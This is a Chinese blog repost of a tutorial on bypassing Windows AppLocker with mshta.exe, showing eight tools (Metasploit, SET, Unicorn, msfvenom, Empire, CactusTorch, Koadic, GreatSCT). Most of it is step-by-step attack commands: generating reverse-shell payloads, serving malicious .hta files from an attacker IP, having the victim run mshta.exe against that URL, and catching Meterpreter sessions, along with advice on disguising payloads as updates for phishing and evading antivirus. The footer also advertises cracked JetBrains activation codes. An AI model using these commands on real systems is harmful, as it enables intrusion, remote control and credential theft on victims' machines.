使用mshta.exe绕过应用程序白名单

使用mshta.exe绕过应用程序白名单今天,我们将学习有关HTA攻击的不同方法。HTA是有用且重要的攻击,因为它可以绕过应用程序白名单。在上一篇文章中,我们讨论了“WindowsApplocker策略-入门指南”,因为它们定义了应用

大家好,又见面了,我是你们的朋友全栈君。

今天,我们将学习有关HTA攻击的不同方法。HTA是有用且重要的攻击,因为它可以绕过应用程序白名单。在上一篇文章中,我们讨论了“ Windows Applocker策略-入门指南 ”,因为它们定义了应用程序控制策略的AppLocker规则以及如何使用它们。但是今天,您将学习如何使用mshta.exe绕过Applocker策略。

而且要了解上述攻击的不同方法总是很方便的。

表中的内容:
  • 介绍
  • HTA的重要性
  • 不同的方法
  • 结论
介绍

长期以来,HTA文件已被用作对野外恶意软件进行偷渡式网络攻击或丢弃程序的一部分。这包括做一些基本的事情,例如转移移动客户端,并教育该网站没有移动支持。从红色分组和蓝色分组的角度来看,HTA文件在网络安全领域是众所周知的,是绕过应用程序白名单的有价值的“复古”方法之一。

Mshta.exe运行Microsoft HTML应用程序主机,这是Windows OS实用程序,负责运行  HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。您可以使用Microsoft MSHTA.exe工具解释这些文件。

重要性

最后,利用htaccess文件或其他策略根据浏览器的类别进行转移将有助于提高获胜率。利用HTA文件进行基于Web的攻击。HTA文件中有很多适应性;您将有效地使其看起来像是Adobe更新程序,每位用户的安全记录以及许多其他功能。此外,对于不使用几种SSL拦截/终止的公司而言,通过HTTPS传输HTA文件会限制发现率。HTA记录仍无法很好地识别,因此有助于绕过防病毒软件。最后但并非最不重要的一点是,HTA也可以用于网络钓鱼,以替代旧的Java Applet攻击。

方法

HTA攻击有多种方法。我们将为几乎所有的人照亮。我们将要研究的方法是:

  • Metasploit
  • Setoolkit
  • Magic unicorn
  • Msfvenom
  • Empire
  • CactusTorch
  • Koadic
  • Great SCT
Metasploit

我们的第一种方法是在Metasploit中使用内置漏洞。为此,请转到您的kali终端,然后输入:

Msfconsole

Metasploit包含“ HTA Web服务器”模块,该模块会生成恶意的hta文件。该模块托管一个HTML应用程序(HTA),该应用程序在打开时将通过Powershell运行有效负载。当用户导航到HTA文件时,IE将在执行有效负载之前两次提示它们。随着Metasploit的启动,输入:

use exploit/windows/misc/hta_server

msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109

msf exploit(windows/misc/hta_server) > exploit

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

执行漏洞利用程序后,它将为您提供扩展名为.hta的URL链接。同时,Metasploit将启动服务器,使您可以共享文件。您还必须在受害者的PC中运行此链接。使用以下命令:

mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta

HTA的通常文件扩展名是.hta。我们之所以使用以上命令,是因为HTA就像任何扩展名为.exe的可执行文件一样,因此是通过mshta.exe执行的。当hta由mshta.exe启动时,它使用已签名的Microsoft二进制文件,使您可以调用PowerShell并将有效负载直接注入内存。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

执行以上命令后,您将打开一个会话。要访问会话,请输入:

sessions 1

这样,您就可以进行Meterpreter会话。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

Setoolkit

HTA攻击的方法是通过setoolkit。为此,请在您的kali中打开setoolkit。然后从给定的菜单中输入1以选择第一个选项,以访问社会工程工具。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

在下一个给定菜单中,通过键入2选择第二个选项以进入网站攻击厂商。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

从另一个给定的菜单中选择选项8以选择HTA攻击方法。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

选择用于HTA攻击的选项8后,接下来需要选择选项2,该选项将允许您克隆站点。选择选项2后,它将询问您要克隆的站点的URL。提供所需的URL,如我们在此指定的’ www.ignitetechnologies.in’一样

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

提供网址后,它将要求您选择所需的仪表类型。通过键入3选择第三

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

在键入3后按Enter键,该过程将开始,您将拥有处理程序(multi / handler)

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

现在,将您的恶意IP转换为位链接,当您与受害者共享此链接时,这些链接对受害者将更真实。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

当受害者浏览恶意链接上方时,文件将被保存,并在保存后自动在受害者的PC中执行;如下图所示:

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

然后获得meterpreter session。您可以使用命令“ sysinfo”获取有关受害人PC的基本信息。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

Magic Unicorn

HTA攻击的下一种方法是使用独角兽第三方工具。魔术独角兽工具由Dave Kennedy开发。它是一种用户友好的工具,使我们可以通过将shellcode直接注入内存来执行HTA攻击。该工具最好的部分是,它与Metasploit以及Shellcode和Cobalt Strike兼容。您可以在trustsec.com上详细了解该软件,也可以从GitHub下载该软件,也可以仅使用此链接下载该软件。

一旦您下载了Magic Unicorn。在kali终端中打开它,然后键入:

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

执行上述命令将开始创建.hta文件的过程。所述.hta文件将在文件夹hta-attack /中创建。进入该文件夹并查看通过键入以下命令创建的文件列表:

cd hta_attack/

ls

现在,您将可以看到.hta文件,即Launcher.hta。启动python服务器,以便可以共享文件。为此,请输入:

python -m SimpleHTTPServer 80

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

服务器启动并运行后,在受害者的PC的cmd提示符下执行以下命令:

mshta.exe http://192.168.1.109/Launcher.hta

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

执行上述命令后,您将在多重/处理器中激活您的会话。要访问会话,请输入:

sessions 1

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

MsfVenom

HTA攻击的下一种方法是通过msfvenom手动创建.hta文件。创建一个.hta文件,在kali的终端中键入以下命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta

执行上述命令将创建一个.hta文件,您可以利用它来发挥自己的优势。创建文件后,打开python服务器,通过键入以下内容将文件共享给受害者的PC:

python -m SimpleHTTPServer 80

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

通过键入以下命令来运行以上文件:

mshta.exe http://192.168.1.109/shell.hta

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

同时,在受害者的cmd提示符下运行上述文件时,启动处理程序以接收会话。要启动多重/处理程序类型:

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

因此,使用这种简单的方法,您将可以进行Meterpreter会议。您可以使用sysinfo来了解受害者计算机的基础知识。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

PowerShell Empire

对于HTA攻击的下一种方法,我们将使用Empire。Empire是一个开发后的框架。到目前为止,我们已经将hta方案与Metasploit配对,但是在这种方法中,我们将使用Empire框架。它仅仅是基于python的PowerShell Windows代理,因此非常有用。Empire是由@ harmj0y,@ sixdub,@ enigma0x3,rvrsh3ll,@ killswitch_gui和@xorrior开发的。您可以从此处下载此框架

要获得《Empire》的基本指南,请访问我们介绍帝国的文章:

Empire框架启动后,键入listener来检查是否有任何活动的监听器。正如您在下图中所看到的,没有活动的侦听器。所以要设置一个监听器类型:

uselistener http

set Host http://192.168.1.109

set port 80

execute

使用以上命令,您将拥有一个活动的侦听器。输入回来以退出侦听器,以便您可以启动PowerShell

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

对于我们的HTA攻击,我们将使用暂存器。 登台者(一个empire)是一小段代码,可让我们的恶意代码通过受感染主机上的代理运行。因此,对于这种类型:

usestager windows/hta

set Listener http

set OutFile /root/Desktop/1.hta

execute

usestager将创建一个恶意代码文件,该文件将保存在名为1.hta的输出文件中。一旦文件运行,我们将在侦听器上得到结果。通过键入以下命令在受害者的文件中运行文件:

mshta.exe http://192.168.1.109:8080/1.hta

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

要查看是否有任何会话打开,请键入“ agents”。这样做将为您显示会话名称。要访问该会话,请输入:

interact L924Z1WR

上面的命令将使您可以访问会话。

sysinfo

info

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

Cactustorch

Cactustorch是一个用于javascript和VBScript shellcode启动器的框架。它是由Vincent Yiu开发的。该工具可以绕过许多常见的防御措施,这对我们到目前为止是一个优势。需要注意的主要问题是,我们在cactustorch中使用的代码是通过msfvenom编写的,然后编码为Base64,因为它仅支持该代码。

因此,首先让我们制造恶意软件,然后对其进行加密。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f raw > 1.bin

现在要加密文件类型:

cat 1.bin |base64 -w 0

复制base64代码,以备后用。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

现在我们已经准备好了恶意软件,让我们下载cactustorch。你可以在这里下载:

https://github.com/mdsecactivebreach/CACTUSTORCH

安装完成后,在已安装文件夹的内容中键入以下内容:

ls -la

./CACTUSTORCH.hta

上面的命令将启动cactustorch进行hta攻击。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

Cactustorch启动后,将base64代码粘贴到高亮显示的空间中,如下图所示,该图像已被复制。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

添加代码后,让我们在受害者的PC中键入以下内容来执行文件:

mshta.exe http://192.168.1.109/CACTUSTORCH.hta

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

同时,启动您的多重/处理器以接收会话。对于多/处理程序类型:

use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.109

msf exploit(multi/handler) > set lport 1234

msf exploit(multi/handler) > exploit

在受害者的PC中执行文件后,即可进行会话。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

Koadic

我们的下一个方法是使用Koadic。Koadic,或COM Command&Control,是Windows开发后的rootkit,类似于Meterpreter和Powershell Empire等其他渗透测试工具。要了解有关Koadic的更多信息,请通过以下链接阅读有关该框架的详细文章:   //www.hackingarticles.in/koadic-com-command-control-framework

koadic启动并运行后,键入info以获取需要提供的详细信息列表才能进行会话。通过信息,您知道需要提供srvhost以及设置端点。因此,设置它们为:

set srvhost 192.168.1.107

set ENDPOINT sales

run

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

通过键入以下命令,将您作为受害者计算机中的文件:

http://192.168.1.107:9999/sales

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

您将启动一个会话并开始运行。要知道会话类型的名称:

zombies

现在访问会话类型:

zombies 0

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

GreatSCT

GreatSCT是一种工具,可让您使用Metasploit漏洞,并绕过大多数防病毒软件。GreatSCT当前在@ConsciousHacker的支持下。您可以从这里下载

下载并运行后,键入以下命令以访问模块:

use Bypass

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

现在查看有效负载列表:

list

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

现在,从有效负载列表中,您可以选择任何人进行所需的攻击。但是对于这种攻击,我们将使用:

use mshta/shellcode_inject/base64_migrate.py

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

执行命令后,键入:

generate

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

执行generate命令后,它会询问您要使用哪种方法。由于我们将使用msfvenom类型1选择第一个选项。然后按Enter键进行抄表。然后分别提供lhost和lport,即192.168.1.107和4321。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

生成shellcode时,它将要求您提供有效负载的名称。默认情况下,它将以“有效载荷”作为名称。因为我不想给任何名字,所以我只按Enter键。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

现在,它制作了两个文件。一个资源文件,另一个hta文件。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

现在,首先,通过键入以下内容在/ usr / share / greatsct-output中启动python的服务器:

python -m SimpleHTTPServer 80

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

现在,在受害计算机的命令提示符下执行hta文件。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

同时,使用资源文件启动多重/处理程序。为此,请输入:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

瞧!你有会议。

<span role="heading" aria-level="2">使用mshta.exe绕过应用程序白名单

结论

因此,基本上,这种类型的攻击是一种简单的HTA攻击,可提供对远程攻击者的完全访问权限。攻击者可以使用Web技术克隆Windows站点,从而为Windows操作系统创建恶意应用程序。简而言之,它通过HTA文件执行PowerShell注入,这些文件可用于通过浏览器进行基于Windows的PowerShell开发。以上是用于攻击的方法。正如他们所说,如果一扇门关闭,另一扇门就会打开。因此,当通过不同方式学习到相同的攻击时通常很方便。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/154636.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • 灾备测试_数据级灾备

    灾备测试_数据级灾备灾备测试

    2022年10月26日
  • GoLand 2021.12.12激活[最新免费获取]

    (GoLand 2021.12.12激活)这是一篇idea技术相关文章,由全栈君为大家提供,主要知识点是关于2021JetBrains全家桶永久激活码的内容IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.cn/100143.html0BXA05X8YC-eyJsa…

  • clion 2021.4.2激活码破解方法

    clion 2021.4.2激活码破解方法,https://javaforall.cn/100143.html。详细ieda激活码不妨到全栈程序员必看教程网一起来了解一下吧!

  • latex中长公式换行,很好的办法

    latex中长公式换行,很好的办法今天在编辑公式时,有一个公式很长,写到一行就出去了。当时之前换行都是方程组或者在括号完之后换,都没有问题。但是今天我也换行的是在括号中间断开。这样出现问题,编辑的时候会出错误提醒。上网查了一些论坛,也有人和我一样的问题,但是都没有解决方案。自己试了好几种方法,又和办公室的其他人讨论了一下,终于找办法了。比较简单的情况:方程组code:\begin{equation}\b

  • 【深入Java虚拟机】之四:类加载机制

    【深入Java虚拟机】之四:类加载机制类从被加载到虚拟机内存中开始,到卸载出内存为止,它的整个生命周期包括:加载、验证、准备、解析、初始化、使用和卸载七个阶段。其中类加载的过程包括了加载、验证、准备、解析、初始化五个阶段。在这五个阶段中,加载、验证、准备和初始化这四个阶段发生的顺序是确定的,而解析阶段则不一定,它在某些情况下可以在初始化阶段之后开始,这是为了支持Java语言的运行时绑定(也成为动态绑定或晚期绑定)。另外注意这里的几个阶段是按顺序开始,而不是按顺序进行或完成,因为这些阶段通常都是互相交叉地混合进行的,通常在一个阶段执行

  • django 聚合函数_sql聚合函数的用法

    django 聚合函数_sql聚合函数的用法前言orm模型中的聚合函数跟MySQL中的聚合函数作用是一致的,也有像Sum、Avg、Count、Max、Min,接下来我们逐个介绍聚合函数所有的聚合函数都是放在django.db.models

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号